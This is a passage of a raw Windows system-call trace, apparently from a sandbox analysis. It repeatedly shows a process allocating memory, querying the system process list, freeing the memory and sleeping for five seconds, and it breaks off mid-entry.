NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0198.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0198.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0198.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0198.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0198.553] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0198.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0198.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0198.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0198.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0198.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0198.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0198.851] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0198.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0198.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0198.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0198.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0198.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0199.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0199.075] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0199.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0199.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0199.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0199.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0199.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0199.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0199.370] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0199.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0199.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0199.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0199.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0199.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0199.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0199.580] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0199.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0199.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0199.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0199.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0199.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0199.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0199.896] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0200.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0200.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0200.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0200.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0200.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0200.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0200.264] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0200.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0200.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0200.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0200.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0200.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0200.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0200.446] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0200.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0200.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0200.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0200.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0200.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0200.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0200.714] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0200.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0200.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0200.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0200.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0200.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0200.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0200.885] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0200.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0200.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0200.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0200.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0200.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0201.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.069] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0201.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0201.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.384] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0201.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0201.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.565] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0201.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0201.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.732] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0201.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0201.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0201.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0201.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0201.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0201.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0201.968] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0202.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0202.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0202.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0202.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0202.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0202.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0202.428] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0202.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0202.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0202.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0202.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0202.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0202.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0202.690] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0202.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0202.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0202.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0202.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0202.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0202.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0202.929] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0202.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0202.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0202.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0202.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0202.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0203.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.136] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0203.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0203.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0203.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0203.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0203.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0203.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.432] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0203.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0203.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0203.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0203.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0203.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0203.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0203.863] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0203.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0203.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 